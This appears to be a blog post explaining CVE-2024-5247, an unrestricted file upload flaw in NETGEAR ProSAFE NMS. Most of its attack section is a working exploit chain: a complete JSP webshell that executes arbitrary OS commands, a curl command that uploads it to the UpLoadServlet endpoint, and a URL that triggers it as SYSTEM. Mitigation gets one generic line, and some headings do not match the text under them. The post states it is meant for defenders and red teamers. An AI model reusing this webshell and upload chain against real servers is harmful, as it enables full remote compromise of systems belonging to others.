CVE-2024-5247 - NETGEAR ProSAFE NMS UpLoadServlet Unrestricted File Upload Remote Code Execution Vulnerability Explained

The vulnerability CVE-2024-5247 highlights a serious security flaw in NETGEAR’s ProSAFE Network Management System (NMS). This post will walk you through what this vulnerability means, how it can be exploited, and includes code and references to help you understand or test this issue.

Authentication: Required

- Discovery Reference: ZDI-CAN-22923

Technical Details

The vulnerable component is the UpLoadServlet class, an endpoint responsible for handling file uploads. This servlet does not properly check the type, content, or destination of uploaded files. That means an authenticated attacker can upload a malformed or malicious file (e.g., a JSP webshell) to the server.

If the attacker manages to place a webshell in a web-accessible directory, they can perform any action with SYSTEM privileges—this is full remote code execution.

Root Cause

The key issue: Missing validation and restriction on allowed file types and upload path. The servlet lets authenticated users upload any file, with little or no sanitization or restriction.

The attacker logs in to the NMS web interface (valid credentials required).

2. Sends a POST request to the UpLoadServlet endpoint that uploads a malicious JSP file (or any other web-executable format) to the server.
3. Accesses the uploaded file via the web server to trigger code execution in the context of the SYSTEM user.

Let’s say you create a simple JSP webshell (shell.jsp)

<% if (request.getParameter("cmd") != null) {
    String output = "";
    try {
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        java.io.BufferedReader reader = new java.io.BufferedReader(
            new java.io.InputStreamReader(p.getInputStream()));
        String line;
        while ((line = reader.readLine()) != null) {
            output += line + "\n";
        }
        reader.close();
    } catch (Exception e) {
        output = e.toString();
    }
    out.println("<pre>" + output + "</pre>");
} %>

Upload the file to the vulnerable endpoint, for example using curl

curl -k -u "admin:password" \
  -F "file=@shell.jsp" \
  "https://<target>:808/prevail/UpLoadServlet";

*Replace admin:password with real credentials and https://<target> with the real IP/domain.*

The webshell is now accessible, such as

https://<target>:808/prevail/upload/shell.jsp?cmd=whoami

This would print SYSTEM or an equivalent privileged user, proving that arbitrary OS commands can be run.

Note: The actual upload path can differ based on NMS version/configuration.

Persistence for follow-on attacks

Attackers do need valid credentials, which can be gained through social engineering, weak passwords, or insider threats.

Mitigation & Patches

- Update NETGEAR NMS: Check NETGEAR Security Advisories for patches.

References

- NETGEAR Official Security Advisory
- ZDI Advisory ZDI-CAN-22923
- CVE Details

Closing Thoughts

CVE-2024-5247 is a dangerous vulnerability for anyone running NETGEAR ProSAFE Network Management System, especially since it enables attackers to upload and run arbitrary code on your server as SYSTEM. If you use this product, patch it immediately, and always restrict who can access NMS!

Stay safe, and keep your network tools up to date!


*This content is exclusive and intended to inform network admins, red teamers, and defenders about active threats and their mitigations.*

Timeline

Published on: 05/23/2024 22:15:14 UTC
Last modified on: 05/24/2024 01:15:30 UTC